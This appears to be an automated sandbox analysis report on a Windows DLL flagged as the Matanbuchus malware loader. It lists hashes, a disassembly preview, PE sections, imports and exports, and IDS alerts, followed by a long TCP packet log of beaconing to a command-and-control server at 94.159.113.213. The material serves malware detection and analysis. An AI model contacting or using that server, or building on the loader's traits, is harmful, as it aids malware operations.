                        SHA512:b51b8e8e82bc1d9a1d8a0e5c86937b375544ee5a0cc4bee8045d3504ee226e36f038461d3ed69ee9b92fcaf3121623a85d0206d596056ae8ad21eecb55ee3788
                        SSDEEP:6144:pVN7/lxioKLkbHwggs6bAVASkqM98IDsCDvhhKgsQb:N/lYjcHDeSkqV8jvhhK9i
                        TLSH:6E546B15F712E660E4AB0178BE14EBF9555D35300784E883B7C22FEA2A356E2DA35F07
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6=..Xn..Xn..XnW.[o..XnW.]o..XnW.\o..Xn.i]o..Xn.i\o..Xn.i[o..XnW.Yo..Xn..Yn..Xn.i]o..Xn.iXo..Xn.iZo..XnRich..Xn........PE..L..

                        File Icon

                        Icon Hash:7ae282899bbab082

                        Static PE Info

                        General

                        Entrypoint:0x1002737b
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x10000000
                        Subsystem:windows cui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                        DLL Characteristics:DYNAMIC_BASE
                        Time Stamp:0x67812600 [Fri Jan 10 13:52:00 2025 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:91719dd2e867694a7eb88b493c8c3318

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        cmp dword ptr [ebp+0Ch], 01h
                        jne 00007F3EA931DBB7h
                        call 00007F3EA931DF61h
                        push dword ptr [ebp+10h]
                        push dword ptr [ebp+0Ch]
                        push dword ptr [ebp+08h]
                        call 00007F3EA931DA63h
                        add esp, 0Ch
                        pop ebp
                        retn 000Ch
                        push ebp
                        mov ebp, esp
                        and dword ptr [104A9730h], 00000000h
                        sub esp, 24h
                        or dword ptr [10041310h], 01h
                        push 0000000Ah
                        call dword ptr [100330D4h]
                        test eax, eax
                        je 00007F3EA931DD62h
                        and dword ptr [ebp-10h], 00000000h
                        xor eax, eax
                        push ebx
                        push esi
                        push edi
                        xor ecx, ecx
                        lea edi, dword ptr [ebp-24h]
                        push ebx
                        cpuid
                        mov esi, ebx
                        pop ebx
                        nop
                        mov dword ptr [edi], eax
                        mov dword ptr [edi+04h], esi
                        mov dword ptr [edi+08h], ecx
                        xor ecx, ecx
                        mov dword ptr [edi+0Ch], edx
                        mov eax, dword ptr [ebp-24h]
                        mov edi, dword ptr [ebp-20h]
                        mov dword ptr [ebp-0Ch], eax
                        xor edi, 756E6547h
                        mov eax, dword ptr [ebp-18h]
                        xor eax, 49656E69h
                        mov dword ptr [ebp-04h], eax
                        mov eax, dword ptr [ebp-1Ch]
                        xor eax, 6C65746Eh
                        mov dword ptr [ebp-08h], eax
                        xor eax, eax
                        inc eax
                        push ebx
                        cpuid
                        mov esi, ebx
                        pop ebx
                        nop
                        lea ebx, dword ptr [ebp-24h]
                        mov dword ptr [ebx], eax
                        mov eax, dword ptr [ebp-04h]
                        or eax, dword ptr [ebp-08h]
                        or eax, edi
                        mov dword ptr [ebx+04h], esi
                        mov dword ptr [ebx+08h], ecx
                        mov dword ptr [ebx+0Ch], edx
                        jne 00007F3EA931DBF5h
                        mov eax, dword ptr [ebp-24h]
                        and eax, 0FFF3FF0h
                        cmp eax, 000106C0h
                        je 00007F3EA931DBD5h
                        cmp eax, 00020660h
                        je 00007F3EA931DBCEh
                        cmp eax, 00000070h

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x3fcf00xec.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3fddc0x78.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x4ab0000x4318.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x382a00x1c.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x381e00x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x330000x1b8.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x31b400x31c0098eacf2076ff62377b072f79e5491ae5False0.5310929648241206data6.495193740048111IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x330000xd7f00xd800d4e8e65351228824418cd80083859772False0.42142288773148145data5.3712295764803075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x410000x46912c0xe007f2acf9b01029bc9db39d40e357f0a8funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .reloc0x4ab0000x43180x4400dc56ec38e035c518e59ece279778da11False0.7805032169117647data6.78967998327928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Imports

                        DLLImport
                        KERNEL32.dllGetCurrentDirectoryA, CreateDirectoryW, FindFirstFileW, GetDriveTypeA, GetFileAttributesA, GetFileType, GetFullPathNameW, GetFullPathNameA, GetTempFileNameW, SetFileAttributesW, GetTempPathW, GetTempPathA, GetTempFileNameA, GetLastError, SetLastError, HeapAlloc, HeapReAlloc, GetProcessHeap, TlsSetValue, FlushInstructionCache, OpenProcess, GetSystemDirectoryA, GetSystemDirectoryW, GetWindowsDirectoryA, GetWindowsDirectoryW, GetEnvironmentVariableW, GetModuleHandleA, GetProcAddress, LoadLibraryExA, LoadLibraryA, LoadLibraryW, SetHandleCount, lstrlenA, lstrlenW, IsValidCodePage, GetACP, GetCPInfo, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, GetModuleFileNameA, GetEnvironmentVariableA, HeapSize, GetStringTypeW, GetStdHandle, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, GetOEMCP, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, DecodePointer
                        USER32.dllOpenClipboard, GetCaretBlinkTime, GetCursorPos, GetDoubleClickTime, CreatePopupMenu, GetWindowTextLengthA, IsIconic, ShowWindow, IsWindow
                        ADVAPI32.dllGetUserNameA
                        ole32.dllCoCreateInstance
                        SHLWAPI.dllStrCmpIW

                        Exports

                        NameOrdinalAddress
                        DllInstall10x10019c90
                        Export20x1001bb10
                        Main30x1001bb60
                        UnregisterDll40x1001bb80
                        curl_easy_cleanup50x1001bc40
                        curl_easy_init60x1001bc50
                        curl_easy_perform70x1001c340
                        curl_easy_setopt80x1001c340

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2025-01-16T06:02:00.600788+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.64971094.159.113.213443TCP
                        2025-01-16T06:02:00.664846+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.64970994.159.113.213443TCP
                        2025-01-16T06:02:02.561415+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.64971294.159.113.213443TCP
                        2025-01-16T06:02:03.975767+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.64971394.159.113.213443TCP
                        2025-01-16T06:02:04.291204+01002034468ET MALWARE Matanbuchus Loader CnC M31192.168.2.64971494.159.113.213443TCP
                        2025-01-16T06:02:08.504894+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.64973394.159.113.213443TCP
                        2025-01-16T06:03:03.710922+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.66442694.159.113.213443TCP
                        2025-01-16T06:04:03.721325+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.66447494.159.113.213443TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 16, 2025 06:01:59.273710966 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:01:59.273771048 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:01:59.273891926 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:01:59.321583033 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:01:59.321640015 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:01:59.321728945 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:01:59.468677044 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:01:59.468746901 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:01:59.503431082 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:01:59.503448963 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.176455021 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.176604033 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.227958918 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.228111982 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.229168892 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.229190111 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.229477882 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.229547024 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.232989073 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.269144058 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.269165993 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.270092010 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.270164967 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.272284985 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.275331974 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.315337896 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.600642920 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.600665092 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.600893974 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.600927114 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.601013899 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.664908886 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.664966106 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.664969921 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.664995909 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.665045023 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.665088892 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.665095091 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.665136099 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.739140034 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.739197969 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.739229918 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.739242077 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.739294052 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.739305019 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.764899969 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.764918089 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.765002012 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.765039921 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.765105009 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.766460896 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.766477108 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.766547918 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.766577005 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.766639948 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.827514887 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.827563047 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.827610016 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.827625990 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.827656031 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.827668905 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.890835047 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.890851021 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.891021013 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.891062975 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.891094923 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.892606020 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.892625093 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.892676115 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.892695904 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.892720938 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.892751932 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.950964928 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.951021910 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.951143026 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.951143026 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.951158047 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.953032970 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.953088045 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.953123093 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.953130960 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.953147888 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.953181982 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.954756975 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.954799891 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.954833984 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.954839945 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:00.954864025 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:00.954886913 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.015779972 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.015794992 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.016005993 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.016036987 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.016580105 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.016596079 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.016650915 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.016674995 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.016704082 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.017674923 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.017687082 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.017751932 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.017767906 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.017832041 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.018654108 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.018667936 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.018732071 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.018743992 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.019505978 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.019521952 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.019581079 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.019593954 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.021836042 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.035832882 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.035881042 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.035942078 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.035953999 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.035975933 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.035998106 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.077142954 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.077166080 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.077215910 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.077227116 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.077255964 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.077267885 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.078428984 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.078449011 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.078491926 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.078497887 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.078517914 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.078533888 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.079513073 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.079535007 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.079590082 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.079597950 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.079607964 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.079638004 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.115367889 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.115417004 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.115458965 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.115467072 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.115489960 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.115514040 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.116302013 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.116357088 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.116395950 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.116401911 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.116425991 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.116442919 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.141695023 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.141710997 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.141772985 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.141803026 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.141834021 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.141884089 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.142252922 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.142266989 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.142333031 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.142345905 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.142410994 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.143028021 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.143043995 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.143114090 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.143126965 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.143203020 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.143779039 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.143794060 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.143857002 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.143867970 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.143934011 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.146110058 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.146126032 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.146190882 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.146203041 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.146260977 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.146714926 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.146729946 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.146795034 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.146806955 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.149763107 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.201792002 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.201875925 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.201878071 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.201909065 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.201932907 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.201965094 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.202805996 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.202852011 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.202883005 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.202889919 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.202924013 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.202935934 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.203753948 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.203798056 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.203830004 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.203843117 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.203866005 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.203927040 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.204476118 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.204519033 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.204549074 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.204555988 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.204585075 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.204608917 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.205396891 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.205444098 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.205476046 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.205482006 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.205507994 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.205532074 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.206232071 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.206307888 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.206331015 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.206372023 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.206394911 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.206423044 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.206429005 CET4434970994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.206459045 CET49709443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.266552925 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.266577959 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.266655922 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.266681910 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.267040014 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.267059088 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.267111063 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.267124891 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.267154932 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.267580986 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.267595053 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.267643929 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.267658949 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.267685890 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.267705917 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.268357992 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.268377066 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.268443108 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.268455982 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.268810987 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.268827915 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.268877029 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.268888950 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.268917084 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.268949986 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.269290924 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.269304991 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.269351959 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.269366980 CET4434971094.159.113.213192.168.2.6
